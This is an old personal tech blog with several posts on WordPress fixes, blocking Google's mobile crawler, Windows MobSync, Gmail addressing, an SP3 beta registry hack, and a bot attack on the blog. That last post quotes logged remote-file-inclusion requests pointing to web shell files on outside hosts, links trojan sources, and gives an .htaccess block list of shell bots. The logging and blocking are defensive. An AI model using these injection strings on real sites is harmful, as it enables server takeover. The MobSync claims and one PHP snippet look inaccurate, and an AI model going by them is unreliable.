I just upgrade today, WordPress 2.3.2, fixed a nasty vulnerability. I haven’t did any test yet but according to “blackhat domainer” you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).

WordPress developer had to release this ’securities’ fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade.

Peter Westwood’s sum up all wordpress 2.3.2 recent change and update in details. Read it first before you decide to upgrade.

External Links

• How to know today what ShoeMoney is going to post tomorrow
• Wordpress 2.3.2 Announcements (dev blog)

When Google Wireless Transcoder (GWT, Googlebot-mobile) translate your website it strip all “scripts” and render it in mobile format (XHTML mobile 1.0)Google version of “Mobile format”. To test this services go to http://google.com/gwt/n. GWT services is actually made for mobile-user but you can still surf with normal browser.

So what the heck wrong with it

The answer is Yes & No. This type of services is bad for webmaster that depend on ads income. Otherwise Normal Surfer would love this services as they wont need to view any ads and surf safely without “javascript embed” (from the originating website).

How to Block Googlebot Mobile Crawler

These are some server environment variables for Google Wireless Transcoder

USER_AGENT

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)

HTTP_VIA

1.1 proxy.google.com:80 (squid)

HTTP_X_FORWARDED_FOR

xxx.xx.xxx.xxx, unknown

REMOTE_ADDR

209.85.138.136

REMOTE_PORT

56931

block via .htaccess

with mod_setenvif

<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent "^Google\ Wireless\ Transcoder*" gwt_agent=1
SetEnvIfNoCase User-Agent "^Googlebot-Mobile*" gwt_agent=1
<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=gwt_agent
</FilesMatch>
</IfModule>

or with mod_rewrite

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Google\ Wireless\ Transcoder [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot-Mobile
RewriteRule ^.* - [F,L]
</IfModule>

Robots Exclusion Standards

User-agent: Googlebot-Mobile
Disallow: /

Google Webmaster Analyze robots.txt

After you add the above robot.txt code login to your Google Webmaster Central.

1. Select Tools > Analyze robots.txt
2. Select Google Mobile : Crawls page for our mobile index on “user-agents dropdown list”.

Embed HTML Meta Link header

<link rel="alternate" media="handheld" href="http://changethis-url-for-mobile-user" />

Google Support

If you want to prevent Google Mobile services from transcoding your page its recommended to request for removal via Google Mobile Support form.

Soap

If google-mobile can restrict this services for mobile only view or maybe implement something like “duggmirror” for normal browsing, it would be welcome.

I used gravatars2 plugins to support my new sexy theme. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I did asked them to updated it but till today’s this bug still exists with Gravatars2 plugins.

This “fatal error” or conflict happen if you had PHP 5 ( 5.0 > 5.1 above) with HTTPRequest Modules Installed.

Plugin could not be activated because it triggered a fatal error.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284

HTTPRequest Classname Conflict

It’s not that hard to fix this “Naming Conflicts”. All you need is “Search and Replace” HTTPRequest class name to different name (ie: _HTTPRequest, HTTP__Request) so it wont conflict with PHP HTTPRequest Standard Class. If you don’t know how to do this. Check the below lists. It wont take long.

1. Open wp-content/plugins/gravatars2.php or http://www.my-domain-name.com/wp-admin/plugin-editor.php?file=gravatars2.php
2. Find on line 284

   class HTTPRequest

   Replace with

   class _HTTPRequest

3. Next find on line 323

   function HTTPRequest($url, $timeout)

   Replace with

   function _HTTPRequest($url, $timeout)

4. Final step find on line 408

   $hr = new HTTPRequest($url, $timeout);

   Replace with

   $hr = new _HTTPRequest($url, $timeout);

5. Save or upload back to wp-content/plugins/

Thats all

Gravatars2

For the record - “Gravatar2 developer doesn’t give support without donation”.

Excerpt from Kip Bond at zenpax.com

I am no longer giving support for this plugin without a donation — it’s becoming repetitive and not very rewarding. You can email me (kip @ this website’s hostname (zenpax.com)) with your question, and I can tell you what minimum donation amount is sufficient per the difficulty of the question. Note that this donation in no way obligates me to any contractual duties. It’s mostly a way to make sure that people have exhausted their own efforts at resolving their own problems before asking for my support. ~kip Bond

I hope these would explain some curiosity.

tips to php developer: used class_exists before declaring any user define class.

Related Links

• Gravatars2 Discussion & Support page

MobSync is a Microsoft Mobile Synchronization Manager available in Win 2000 & Windows XP

Excerpt from Microsoft KB 314512 Articles (2002)

The Windows XP Synchronization Manager helps ensure that the files and folders on your mobile device and your desktop computer stay synchronized. With Synchronization Manager, you can be sure you are always working with the latest copy of your data, online or offline.

Technically MobSync is part of Windows Memory Management, its prefetch (type of cache) your External Device Contents (Mobile PC, Windows Embed XPE, PDA,database etc .. ) thus helps speed up the Windows booting process by shortening the time external device programs takes to start up.

MobSync Issue

MobSync is registered to run on logon but the process is hidden on others ‘Scans Tools’ like Autoruns.exe & Process.exe (SysInternal).

QuickFact:

• MobSync.exe can record inputs.
• Its hide itself from monitor applications.

Apparently because of its transparencies nature to hide behind windows systems some hackers decide to reverse engineer this programs as a Trojan Rootkit.

Should I disabled Mobsync?

If you used windows for surfing and office works you probably wont need this programs (crapware) most modern mobile device has a build in Synchronization Manager and doesnt relies on microsoft mobsync (dependencies issue). Its recommended to disabled this programs as it can hide itself from being monitored and doesnt showup on running process lists.

Step by step guide to disabled MobSync from your windows.

1. Disabled System Restore

   You will need to disabled Windows System Restore (Temporary).

2. View hidden system files

   Suspicious files is known to hide itself as Windows System files. The following settings will set all hidden files viewable so we could removed it.

   • Click on Windows Start → Control Panel → Folder Options → View Tab
   • Turn on the option to show hidden files

3. Clean Temporary Files and Windows Prefetch Files

   This wont harm your system. Removes all files inside the following directory. Remove the contents only not the folders.

   • C:\temp
   • C:\windows\temp
   • C:\Documents and Settings\<username>\Local Settings\Temp
   • C:\windows\prefetch

4. Boot in SafeMode

   Restart your PC in safe mode. Refer KB 31522 on How To Boot in Safe Mode.

5. Disabled MobSync Process

   1. Click on start → Run → mobsync
   2. Next, Click on Setup buttons
   3. On “Synchronizations Settings” Windows Logon/Logoff tab un-check all the following options:

      Automatically Synchronize the following items:

      • When I log on to my computer
      • When I log off to my computer
   4. While still in “Synchronizations Settings” Windows select the next tab label “on Idle” un-check the following items:
      • Synchronize the selected items while my computer is idle

6. Removed from system registry

   If you arent familiar with registry you may skip this part. Most normal startup programs can be found at the following registry path.

   • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
   • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
   • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

   In Windows XP all loaded “startup programs” (start menu/startup items) can be found at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg

   Mobsync registry HKLM\Software\Microsoft\Windows\CurrentVersion\syncmgr

Note on using Rootkit Scanner.

• James A. Eshelman HijackThis
• SysInternal RootkitRevealer
• F-secure Blacklight

Most advance Rootkit has a self mechanism to shutdown the system if any of this programs is identify in the memory. If you had this programs installed its advice to rename the programs first.

• RootKitRevealer.exe → RKV.exe
• HijackThis → hjct.exe

How to validate if the running programs is Tempered

Get Certificate Verification Tool ( WM Software Corp) and verify the programs signature or you could also run Microsoft sigverif.exe (c:\windows\SIGVERIF.TXT) to verify digital signature.

Caveat: Most Rookit is “padded/mugged” with unix controls character so its not readable by Windows (ANSI).

Setupapi.log entries

Setupapi.log can be found inside c:\windows\setupapi.log You need to enabled logging in verbose mode to get proper setup log.
HKLM\Software\Microsoft\Windows\CurrentVersion\SetupLogLevel

Insert DWORD value 0000FFFF to enabled verbose mode logging

Insert DWORD value 0 to disabled it

Tempered MobSync.exe & similar windows networks files.

An unsigned or incorrectly signed file
(c:\windows\msdownld.tmp\as03b1e1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll to
C:\WINDOWS\SYSTEM\msidle.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\msidle.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe to
C:\WINDOWS\SYSTEM\mobsync.exe.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.exe) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll to
C:\WINDOWS\SYSTEM\mobsync.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll to
C:\WINDOWS\SYSTEM\sens.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sens.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll to
C:\WINDOWS\SYSTEM\sensapi.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sensapi.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll to
C:\WINDOWS\SYSTEM\senscfg.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\senscfg.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll to
C:\WINDOWS\SYSTEM\es.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\es.dll) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll to
C:\WINDOWS\SYSTEM\esshared.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esshared.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll to
C:\WINDOWS\SYSTEM\estier2.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\estier2.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd to
C:\WINDOWS\SYSTEM\sage.vxd.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\sage.vxd) was installed. Error 0x800b0003:
The form specified for the subject is not one supported or known by the
specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll to
C:\WINDOWS\SYSTEM\esenu.dll.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\esenu.dll) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf to
C:\WINDOWS\INF\mobilepk.inf.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.inf) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp to
C:\WINDOWS\help\chnscsvr.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\chnscsvr.hlp) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat to
C:\WINDOWS\SYSTEM\sfp\ie\mobilepk.cat.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobilepk.cat) was installed. Error
0x800b0003: The form specified for the subject is not one supported or known by
the specified trust provider.
Copying file C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp to
C:\WINDOWS\help\mobsync.hlp.
An unsigned or incorrectly signed file
(C:\WINDOWS\msdownld.tmp\AS03B1E1.tmp\mobsync.hlp) was installed. Error
0xe000022f: The third-party INF does not contain digital signature information.

Summary

What really bother me, is Microsoft Windows Setup API. Any downloaded Microsoft system files has embed sign-in digital signature. Windows installation will validate all setup file and logs out error if the file has a bad signature (third party signature or file being tempered). The flaw is within the Windows Setup API itself. It doesn’t protect you from installing bad programs.

You should thanks Microsoft developer for making good Installation Programs and reporting tools. it remind you of error but installed it nonetheless.

External Links

• MSDN System Event Notification Service (SENS)

You can used this technique to register on sites and forum. To name a few → digg, myspace, newsvine, 9rules, blogger & msn etc.

Gravatar sign-up process took less than 5 minute to complete and they don’t burden you with filling form chores (i.e: address, newsletter subscriptions, marketing questionnaire). So we pick Gravatar Web services for this guide.

Requirements

You must have the following email.

1. Gmail or Google Aps Gmail

Gmail Plus-Addressing Features

In brief, Gmail services has undocumented plus-addressing features (+) since early 2004. The plus-addressing features is mostly used for writing self notes, email filtering and mapping (google maps).

“Gmail never announce this features (beta forever) as there is no official documentation at Gmail Help Center.” — Anon

RFC 2282 - Internet Message Format

Technically, the plus sign operator is a standard URI protocol for handling Email address including telephone and fax (+tel, +fax ). This standard is maintained by Internet Engineering Task Force (IETF Network Group) → RFC 2282 “Internet Official Protocol Standards - Internet Message Format”.

1. Gravatar Signup Process

The signup pages can be found at the following address ↓

• http://site.gravatar.com/signup

Normal Signup

2. Gravatar Sign-up with Gmail Plus-addressing Features

Gmail Forwarding

Example of valid Gmail plus-sign-address code.

3. How Does It Work?

• Below is raw header received from Gravatar for billgates+mypwned.avatar@gmail.com.

  Delivered-To: billgates@gmail.com
  Received: by 10.114.235.16 with SMTP id i16cs666570wah;
   Tue, 11 Dec 2007 02:13:40 -0800 (PST)
  Received: by 10.100.247.14 with SMTP id u14mr17188447anh.1196668020044;
   Tue, 11 Dec 2007 02:13:40 -0800 (PST)
  Received-SPF: fail (google.com: domain of support@gravatar.com does not designate 72.232.151.155 as permitted sender) client-ip=72.232.151.155;
  Received: by 10.36.223.23 with POP3 id v23mf1698886nzg;
   Tue, 11 Dec 2007 02:13:40 -0800 (PST)
  X-Gmail-Fetch-Info: billgates@gmail.com 1 smtp.gmail.com 995 billgates
  Delivered-To: billgates+mypwned.avatar@gmail.com
  Received: by 10.141.85.4 with SMTP id n4cs336075rvl;
   Tue, 11 Dec 2007 02:13:35 -0800 (PST)
  Received: by 10.151.7.4 with SMTP id k4mr2609357ybi.1197368014852;
   Tue, 11 Dec 2007 02:13:34 -0800 (PST)
  Return-Path: <support@gravatar.com>
  Received: from app1.dfw.gravatar.com (155.151.232.72.static.reverse.ltdomains.com [72.232.151.155])
   by mx.google.com with ESMTP id a13si6664003rnc.2007.12.11.02.13.34;
   Tue, 11 Dec 2007 02:13:34 -0800 (PST)
  Received-SPF: neutral (google.com: 72.232.151.155 is neither permitted nor denied by best guess record for domain of support@gravatar.com) client-ip=72.232.151.155;
  Authentication-Results: mx.google.com; spf=neutral (google.com: 72.232.151.155 is neither permitted nor denied by best guess record for domain of support@gravatar.com) smtp.mail=support@gravatar.com
  Received: from gravatar.com (localhost.localdomain [127.0.0.1])
  	by app1.dfw.gravatar.com (Postfix) with ESMTP id 50EB08F36CA5
  	for <billgates+mypwned.avatar@gmail.com>; Tue, 11 Dec 2007 10:13:34 +0000 (UTC)
  Date: Tue, 11 Dec 2007 10:13:34 +0000
  From: support@gravatar.com
  To: billgates+mypwned.avatar@gmail.com
  Message-Id: <475e62ce4f383_94b15911e666750191132@app1.dfw.gravatar.com.tmail>
  Subject: Welcome to Gravatar
  Mime-Version: 1.0
  Content-Type: text/plain; charset=utf-8
  
  Welcome to gravatar!
  
  To activate your account, simply click on the link below or paste into the url field on your favorite browser:
  
  http://site.gravatar.com/activate/666aff604f5eba8025c1
  
  When you visit the above page, you'll be able to set your password and create your first gravatar, all for free!
  
  If you have any questions about the system, feel free to contact us anytime at support@gravatar.com.
  
  Tom Werner
  Gravatar Founder
  

• When gmail received the email with the plus-addressing code it will split it up as follow
  • billgates+mypwned.avatar@gmail.com
  • login-name = billgates
  • filter-name = mypwned.avatar

  And Gmail will forward the email to the login-name@gmail.com → billgates@gmail.com.

Where to start

Make sure you can received the plus-sign-address email. Try compose new email with the plus sign to yourself.

Example:
Well, assume that your email account is : leeeroyjenkins@gmail.com
So compose new email like so:

From: leeeroyjenkins@gmail.com
Send-To: leeeroyjenkins+selftest@gmail.com
Subject: Hello world
Message-Body: Over, Over, Do u read me.

That should be all. check the related links for further read on Gmail tips and documentations.

Extra notes

There is few special characters you can play with.

1. Period . → billgates+all.your.base.belong.to.us@gmail.com
2. Hypen - → billgates+chuck-norris-fans-club@gmail.com
3. Asterisk *→ billgates+my*space@gmail.com

Related Links

• Gmail Official Discussion Group
• Jim’s tip on How to maintain “notes” in Gmail
• Official Gmail Advanced Search Parameters

This is funny thought. This issue has been around for quite awhile now. Matt’s said ([wp-hackers] Decision time in re: admin rework) they wont change the “Howdy” to “hello” or “G’day” as its a localization specific (l10n). Thats true. But If you think proper greeting is important, you can try the following steps.

Wordpress admin-header.php

• Open */wp-admin/admin-header.php
• Login to WordPress Admin goto Manage > Files > Type in “wp-admin/admin-header.php”
  
• find on line 46

  <div id="user_info"><p><?php printf(__('Howdy, <strong>%s</strong>.'), $user_identity) ?> [<a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="<?php _e('Log out of this account') ?>"><?php _e('Sign Out'); ?></a>, <a href="profile.php"><?php _e('My Profile'); ?></a>] </p></div>
  

• Replace with

  <div id="user_info"><p><?php echo __('Hello').', <strong>' $user_identity.'</strong>'; ?> [<a href="<?php echo get_option('siteurl'); ?>/wp-login.php?action=logout" title="<?php _e('Log out of this account') ?>"><?php _e('Sign Out'); ?></a>, <a href="profile.php"><?php _e('My Profile'); ?></a>] </p></div>
  

g’day :p

Related Links

• Wordpress Ideas & Suggestions

Windows XP Service Pack 3 (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.

• Microsoft Download Center → Windows XP Service Pack 3 Release Candidate.

If the above failed you may try the Beta Tester hack below.

The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.

@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f

Copy the above code and save it as sp3betatester.bat or sp3betatester.cmd in your “C:\”. Run the sp3betatester.* file and go to start → windows update. You should now see Windows XP SP3 (rc) listed in the available updates.

Microsoft Disclaimer
This pre-release software is provided for testing purposes only. Microsoft does not recommend installing this software on primary or mission critical systems. Microsoft recommends that you have a backup of your data prior to installing any pre-release software.

Uninstaller

SP3 installation has a recovery mode (rollback) make sure System Restore is enable when you setup SP3. You can removed SP3 via Windows Add Remove Programs or by manual using its build in uninstaller at C:\WINDOWS\$NtServicePackUninstall$\spuninst

External Links

• Windows XP Service Pack 3 Overview
• Official Windows XP SP3 Forum

I’m following up recent announcements on IEBLOG Internet Explorer 8 and Acid2: A Milestone. To my surprise, the Web Standard Groups ACID2 Test Page doesn’t conform to W3C CSS Validation.

The Errors

9 errors & 31 warnings.

Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink

• W3c CSS Validation → http://www.webstandards.org/files/acid2/test.html

Full page Screenshot

Update: Just got ping from chaoskaizer. She said the CSS ERROR is part of the Web Standards Test Suit.

For this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

To view the following source you need to exclude the website host from your anti-virus program.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet)

If you has similar problems. you should block the following domain in your htaccess.
mod_setenvif

SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

if u arent sure if you server support mod_setenvif wrap it like the below example.

<IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

How to trap Perl Shell Bot

We need a pattern to trap this bots. certainly we knew that these bots :

• doesn’t honor robot.txt
• they crawl all subdirectory
• they has a pattern URI request

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

Recent Scan & Update

The below list is automatically added.

December 24, 2007

ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt

December 24, 2007

ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????

December 25, 2007

ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

External Resources

• Packet spoofing - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/

Localization: